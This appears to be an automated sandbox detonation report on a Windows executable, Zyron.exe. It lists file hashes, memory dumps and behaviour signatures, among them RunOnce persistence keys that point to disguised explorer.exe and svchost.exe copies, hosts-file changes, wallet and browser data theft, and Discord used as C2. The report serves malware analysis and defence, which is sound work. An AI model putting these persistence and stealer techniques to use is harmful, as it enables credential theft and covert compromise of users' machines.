SHA512 f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

C:\Users\Admin\AppData\Local\Temp\JNp0h3BcDA.tmp

MD5 42c395b8db48b6ce3d34c301d1eba9d5
SHA1 b7cfa3de344814bec105391663c0df4a74310996
SHA256 5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d
SHA512 7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

C:\Users\Admin\AppData\Local\Temp\nJArpaTbyI.tmp

MD5 8f5942354d3809f865f9767eddf51314
SHA1 20be11c0d42fc0cef53931ea9152b55082d1a11e
SHA256 776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea
SHA512 fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

C:\Users\Admin\AppData\Local\Temp\VCouic5Wza.tmp

MD5 7e58c37fd1d2f60791d5f890d3635279
SHA1 5b7b963802b7f877d83fe5be180091b678b56a02
SHA256 df01ff75a8b48de6e0244b43f74b09ab7ebe99167e5da84739761e0d99fb9fc7
SHA512 a3ec0c65b2781340862eddd6a9154fb0e243a54e88121f0711c5648971374b6f7a87d8b2a6177b4f1ae0d78fb05cf0ee034d3242920301e2ee9fcd883a21b85e

C:\Users\Admin\AppData\Local\Temp\7hWgokbyp5.tmp

MD5 73bd1e15afb04648c24593e8ba13e983
SHA1 4dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91
SHA256 aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b
SHA512 6eb58fb41691894045569085bd64a83acd62277575ab002cf73d729bda4b6d43c36643a5fa336342e87a493326337ed43b8e5eaeae32f53210714699cb8dfac7

memory/3516-609-0x00007FFFA8610000-0x00007FFFA8635000-memory.dmp

memory/5688-619-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3516-627-0x00007FFF98540000-0x00007FFF98564000-memory.dmp

memory/3516-631-0x00007FFF96830000-0x00007FFF969A6000-memory.dmp

memory/5688-637-0x0000000000400000-0x000000000041F000-memory.dmp

memory/6004-636-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4852-635-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3516-639-0x00007FFF969B0000-0x00007FFF97088000-memory.dmp

memory/3516-649-0x00007FFF980E0000-0x00007FFF981AD000-memory.dmp

memory/3516-648-0x00007FFF981B0000-0x00007FFF981E3000-memory.dmp

memory/3516-640-0x00007FFFA8610000-0x00007FFFA8635000-memory.dmp

memory/3516-650-0x00007FFF95A50000-0x00007FFF95F72000-memory.dmp

memory/2384-660-0x0000000000400000-0x000000000041F000-memory.dmp

memory/5500-661-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1068-662-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3516-683-0x00000131DCDA0000-0x00000131DD2C2000-memory.dmp

memory/3516-698-0x00007FFF96710000-0x00007FFF9682B000-memory.dmp

memory/3516-703-0x00007FFF98570000-0x00007FFF9859D000-memory.dmp

memory/3516-702-0x00007FFFA89E0000-0x00007FFFA89EF000-memory.dmp

memory/3516-701-0x00007FFFA8610000-0x00007FFFA8635000-memory.dmp

memory/3516-700-0x00007FFF969B0000-0x00007FFF97088000-memory.dmp

memory/3516-699-0x00007FFF981B0000-0x00007FFF981E3000-memory.dmp

memory/3516-695-0x00007FFF95A50000-0x00007FFF95F72000-memory.dmp

memory/3516-697-0x00007FFFA82B0000-0x00007FFFA82BD000-memory.dmp

memory/3516-694-0x00007FFF980E0000-0x00007FFF981AD000-memory.dmp

memory/3516-692-0x00007FFFA8600000-0x00007FFFA860D000-memory.dmp

memory/3516-691-0x00007FFF98FE0000-0x00007FFF98FF9000-memory.dmp

memory/3516-690-0x00007FFF96830000-0x00007FFF969A6000-memory.dmp

memory/3516-689-0x00007FFF98540000-0x00007FFF98564000-memory.dmp

memory/3516-696-0x00007FFF98940000-0x00007FFF98954000-memory.dmp

memory/3516-688-0x00007FFFA5DE0000-0x00007FFFA5DF9000-memory.dmp

memory/5964-731-0x00007FFF969B0000-0x00007FFF97088000-memory.dmp

memory/5964-732-0x00007FFFA8620000-0x00007FFFA8645000-memory.dmp

memory/5964-733-0x00007FFFAB8C0000-0x00007FFFAB8CF000-memory.dmp

memory/5964-738-0x00007FFFA8260000-0x00007FFFA828D000-memory.dmp

memory/5964-739-0x00007FFFA8830000-0x00007FFFA8849000-memory.dmp

memory/5964-741-0x00007FFFA4070000-0x00007FFFA41E6000-memory.dmp

memory/5964-740-0x00007FFFA8230000-0x00007FFFA8254000-memory.dmp

memory/5964-742-0x00007FFFA8600000-0x00007FFFA8619000-memory.dmp

memory/5964-744-0x00007FFFA81F0000-0x00007FFFA8223000-memory.dmp

memory/5964-743-0x00007FFFA89E0000-0x00007FFFA89ED000-memory.dmp

memory/5964-745-0x00007FFF95A50000-0x00007FFF95F72000-memory.dmp

memory/5964-748-0x00007FFFA3FA0000-0x00007FFFA406D000-memory.dmp

memory/5964-747-0x00007FFF969B0000-0x00007FFF97088000-memory.dmp

memory/5964-746-0x000001DC89610000-0x000001DC89B32000-memory.dmp

memory/5964-749-0x00007FFFA8620000-0x00007FFFA8645000-memory.dmp

memory/5964-751-0x00007FFFA83D0000-0x00007FFFA83DD000-memory.dmp

memory/5964-750-0x00007FFFA82E0000-0x00007FFFA82F4000-memory.dmp

memory/5964-752-0x00007FFF98380000-0x00007FFF9849B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Music\ResetUnpublish.png

MD5 aec16ac87172471c7af1ab3cda2b240b
SHA1 ec8decd2d8e05af3e3cccfce930ab714ca16b9f4
SHA256 c484be31f20604c6b152addaefe69d43893ef4260229ff0daad0a7164da6a50b
SHA512 bc8e750720c3ada40ba1b49053bc9caa37e5da489da1798348292356c3f04ccf4ace1129b7ca1dd51c6762277241456c37a4b370f547e256c4d4bff02312f64c

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Music\RequestInitialize.jpeg

MD5 c03b259b519d0cecf1c4e7ae9e7ead7b
SHA1 1e694d0157356072b253862594cc15ac0f27aa3b
SHA256 fce60de15fcb055bb5f01c00abc02eee74b7d0b06169193af3a9d09e57339139
SHA512 d637374a49bada8f6de08c65637bc3f0e473429ce1683b178b789fa86f87ac09a3d25c2f8ff39c7b021202f59827865dda77b25f07a434d7924f82a0cd80ebdc

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Music\InvokeEnter.txt

MD5 99f41db4a444fab85734295c87acc9bb
SHA1 627fbe23eeb350a6b7ca0e7dc0922a48731f9dd0
SHA256 0f61c37eb778f2749ce133b0fe4658206f35a1131141397e84b5c018b147c6ef
SHA512 2aeb1058d765fbb71add0931404eee93adf8b4c6f00837641472f45f5677a394088dabc4f0e93374e90326f1176bed75b37f7be1ec0a9be35ce688b2b61e26ed

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Documents\These.docx

MD5 87cbab2a743fb7e0625cc332c9aac537
SHA1 50f858caa7f4ac3a93cf141a5d15b4edeb447ee7
SHA256 57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023
SHA512 6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Pictures\UnpublishMerge.jpeg

MD5 adcddca390c3a5d15c1a725417a27501
SHA1 191b7209f424fb22289871bfb196e3e39db3e57d
SHA256 8ed834c991f20512dcea85ec51ce50d0d2b995174841a64d1127f7c29ea8dc88
SHA512 1ce7e4a85ea8c3a9cfbb6af43fcc95545f96261574859d90dddc8aa53487a26181fe2fac7809fe3782b3d3cf61f6dbbdfb0811d4dd565ebc2939670c12447bef

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Pictures\SuspendBackup.dxf

MD5 7f98877d72431ccb4b1fd807d3094511
SHA1 c1924541bbd60a8c1d5b8cf8e11ad6f842eb7b38
SHA256 545511179b6c39dd372aedbd285c3766d4a962545c19c6457de24f4899efe4ad
SHA512 d5a4092a2add5bfa4384552a9f580d3ce40957caf8a1f37e8e09bea4b7582de0a6f85f6cc4ca6b12868700f801f954bdce1ea139f17ee179136c6438b7fdfb48

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Pictures\StartSend.jpg

MD5 4f384e5b5202def2ce5431fbc6db0de8
SHA1 1ce64098267822b774e5b6aac22cb2a74fbcbbd5
SHA256 3b5a7a3c57d34deef444aed4320c1dca5ec21c796f5390bccffec5f105f3b0b5
SHA512 0f472a7b90971314c5c56e8efffcd99516f6481de3687af30d25b3e0be257a7633296bf0d71b207af5bd61de8757d1b81320a1b1b55e8cb7dfca20e9aeaa7dee

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Pictures\RegisterResume.png

MD5 1cf14c408b5901047f8fbf21d46c01f0
SHA1 c50660218e293f3763ca2edd864cc2ef79db0714
SHA256 0a06e5d7a796d6837c5076d1e529567dbfa0cf81b92c979d2701ba078027eb8d
SHA512 bf590aad46ce41cacb5f65b7fcf9fa66e383369b6634e7c4cc78e7ee0b50905c47d3ce85b8a7a631e395ffd451003a7408e61d58e96ed77e2b0f5961776949e8

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Pictures\My Wallpaper.jpg

MD5 a51464e41d75b2aa2b00ca31ea2ce7eb
SHA1 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d
SHA256 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f
SHA512 b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Pictures\MoveConvertTo.jpg

MD5 42a00df76e3797c3ca888468937938c1
SHA1 80df94d9c0db17a819b5b3343368732b411d6f4c
SHA256 e5467f3a8c78cf4e75f624b85511bf38a41541d7d4af4bdd6ac73c638fe5fa2f
SHA512 6f857c8d7e282111641692af5802f154a05e7a9a26776e6266d3f86424835ed66aaaa17d500b2d169ad88e51dfdcdd3f4cf06ee0183c04114c3b78d49647dcd9

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Pictures\GroupCheckpoint.jpg

MD5 0346bab1150745eebbbc4502c020cb97
SHA1 4fa57d4ab49fbf9d4ec5c95330550a662d83cc41
SHA256 4ac1e56f5f26294bb584e12516ae50b554626f12dc7a751a66cb82c2cf8b1827
SHA512 883f469ce35add49c693242b18f283f90c483054bea3d2d41e72d9542c300f189ed09df28f6c44c19c085fbf678f466cb46a8d4749aa3001ec87e382fc83bb02

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Pictures\CloseStart.jpg

MD5 8050b20937bf0cbd4cc565f7f93ef443
SHA1 b68d8467b7553e77d844e94d61233277394933a5
SHA256 98a6db0c1074c475bf8743906dfbeebc2eafdb49c3d2bb621c209dcd6b7ab0cd
SHA512 c149b2570641b9964e5fbf74148946b92ff18451667fae45f373a0282d3586b64d71387e09ae93657e0dfd8927697e2bb494a9c7bc71b24d29d4a927f2efadea

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Downloads\GetBackup.gif

MD5 824e0e594d416c7f4bb144bd5ccb95e1
SHA1 8f4e6247423f5886548653024499c636fc90df78
SHA256 77ee5fbb43ab8e8f4b36c7b5424bf12858037ff80098d4799c8f0d67167c0a7c
SHA512 1b902fe1eba10e1318abfb86d5eb9aeeb25293f59ced4963ea867f9ad0edfa230bafdb40d34b262e89cb0928e9249d5ea0e86559637e9e29e03c7b79d768e726

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Music\RequestBackup.lock

MD5 c4b25d8fa14aaa0dae74b50361720490
SHA1 35e8829d7ad47bb865e30d74e9fc5b2c1a5333e8
SHA256 556df17bc5d883db36b879a37340a580c06d7780ebb6893e8d671e6f91216331
SHA512 7a413bda2cc755371adafb67481f06d6524e72b49424493e7e747a2179aac7978ae8883f085ef8d8142e9d77920dac5b26269885b952e259358bdb3186175d85

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Documents\Recently.docx

MD5 3b068f508d40eb8258ff0b0592ca1f9c
SHA1 59ac025c3256e9c6c86165082974fe791ff9833a
SHA256 07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7
SHA512 e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Pictures\ConvertBackup.wmf

MD5 d03ce26c77a573bd5b764627a6519fd2
SHA1 9badcac77466e4bbe5a2a6ff292971c6563d8676
SHA256 7ca287513b0d92300110636b2298cdd880f89eaa276590d0ccea0f32b1914c0c
SHA512 25b191c0fd78388ede01ae37ecd9a66bd5ab6dd3130736aff2555bfd9485b946820d6a88053d8d4a98a08d0842ba0b66cfeeed62627de19029cc5b1b8dd7a776

memory/4116-904-0x000002AFDB820000-0x000002AFDB828000-memory.dmp

memory/5964-940-0x00007FFFA8620000-0x00007FFFA8645000-memory.dmp

memory/5964-939-0x00007FFF969B0000-0x00007FFF97088000-memory.dmp

memory/5964-955-0x00007FFFA4070000-0x00007FFFA41E6000-memory.dmp

memory/5964-954-0x00007FFFA8230000-0x00007FFFA8254000-memory.dmp

memory/4136-973-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3712-974-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 439b5e04ca18c7fb02cf406e6eb24167
SHA1 e0c5bb6216903934726e3570b7d63295b9d28987
SHA256 247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654
SHA512 d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8e20bf45a7f6b885b6813fe236a0e39a
SHA1 681783bfd0e62e9458ff36416cdd460f693e98d2
SHA256 9cf6530ca3741b42d00e5b8c2f8c3dd8f89e7c8d8d78d94ea088f4ed2f7e6154
SHA512 dd2cb90a5816edd782e8f062434a50ab006a10441c073f5a3ae8da96dd088a10503f23f4171016a02ffc48874f16ac7f06ebd66e35d7f7e288e99d1100c5e5e3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-31 17:16

Reported

2024-05-31 17:20

Platform

win11-20240426-en

Max time kernel

150s

Max time network

94s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Zyron.exe"

Signatures

Modifies visiblity of hidden/system files in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" \??\c:\windows\resources\svchost.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" \??\c:\windows\resources\themes\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" \??\c:\windows\resources\themes\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" \??\c:\windows\resources\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" \??\c:\windows\resources\svchost.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\explorer.exe \??\c:\windows\resources\themes\explorer.exe N/A
File opened for modification C:\Windows\SysWOW64\explorer.exe \??\c:\windows\resources\svchost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification \??\c:\windows\resources\themes\explorer.exe C:\Windows\Resources\Themes\icsys.icn.exe N/A
File opened for modification \??\c:\windows\resources\spoolsv.exe \??\c:\windows\resources\themes\explorer.exe N/A
File opened for modification \??\c:\windows\resources\svchost.exe \??\c:\windows\resources\spoolsv.exe N/A
File opened for modification C:\Windows\Resources\tjud.exe \??\c:\windows\resources\themes\explorer.exe N/A
File opened for modification C:\Windows\Resources\Themes\icsys.icn.exe C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A \??\c:\windows\resources\svchost.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
